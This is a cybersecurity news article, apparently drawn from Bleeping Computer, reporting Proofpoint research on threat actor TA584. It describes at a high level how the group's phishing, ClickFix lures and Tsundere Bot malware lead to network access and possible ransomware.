Hackers Now Use Tsundere Bot for Ransomware Attacks
▼ Summary
– TA584, a prolific initial access broker, is using Tsundere Bot and XWorm malware to gain network access, which researchers assess could lead to ransomware attacks.
– The threat actor’s campaign volume tripled in late 2025, expanding its geographic targeting to include Germany, other European countries, and Australia beyond its usual North American and UK/Ireland focus.
– TA584’s attack chain uses emails from compromised accounts, unique URLs with geofencing, and redirects through traffic direction systems, leading to a page that tricks targets into running a malicious PowerShell command.
– Tsundere Bot is a malware-as-a-service platform that uses the Ethereum blockchain for command-and-control communication, avoids infecting systems in CIS countries, and has capabilities for data theft and acting as a proxy.
– Proofpoint researchers expect TA584 to continue targeting a broader range of victims and experimenting with various malware payloads in its operations.
Cybersecurity researchers have identified a significant escalation in the operations of a threat actor known as TA584, who is now deploying a combination of the Tsundere Bot and XWorm remote access trojan to establish initial access in corporate networks. This access is frequently leveraged to deploy ransomware, posing a severe risk to organizations globally. The group’s campaign volume tripled in late 2025, expanding its geographic focus beyond North America and the UK to now include Germany, Australia, and other European nations.
Proofpoint, which has monitored TA584 since 2020, reports the actor has refined a sophisticated, continuous attack chain designed to evade static security defenses. The process typically starts with phishing emails dispatched from hundreds of compromised, aged email accounts using services like SendGrid and Amazon SES. These messages contain unique URLs for each recipient, protected by geofencing and IP filtering. Potential victims are then routed through complex redirect chains, often managed by traffic direction systems like Keitaro.
Individuals who pass the initial filters encounter a CAPTCHA page, followed by a deceptive “ClickFix” page. This page instructs the target to copy and execute a specific PowerShell command, a critical step in the infection. This command downloads and runs an obfuscated script that loads either the XWorm trojan or the Tsundere Bot directly into the system’s memory. To maintain stealth, the browser is then redirected to a legitimate website.
The Tsundere Bot itself is a formidable malware-as-a-service platform with backdoor and loader functions. First documented by Kaspersky and linked to Russian-speaking operators, it requires Node.js to operate, which it installs automatically. A notable feature is its command-and-control (C2) communication method; it retrieves C2 addresses from the Ethereum blockchain using a technique akin to EtherHiding, with a hardcoded backup address included as a fallback. The malware communicates via WebSockets and contains a check to abort infection if the system’s language is set to a Commonwealth of Independent States (CIS) country, such as Russian, suggesting the operators wish to avoid compromising systems in certain regions.
Once installed, Tsundere Bot gathers extensive system information, can run arbitrary JavaScript code from its controllers, and can turn infected machines into SOCKS proxies for further malicious activity. The platform even includes an internal marketplace where access to these compromised “bots” can be bought and sold. Proofpoint assesses with high confidence that infections involving this malware can lead directly to ransomware deployment, given TA584’s established patterns.
Historically, TA584 has utilized a wide array of payloads including Ursnif, Cobalt Strike, and DCRAT. Researchers anticipate this actor will continue to experiment with new payloads and broaden its target range. This evolving threat underscores the need for organizations to enhance defenses against social engineering and to monitor for suspicious PowerShell activity, which remains a cornerstone of this aggressive attack chain.
(Source: Bleeping Computer)
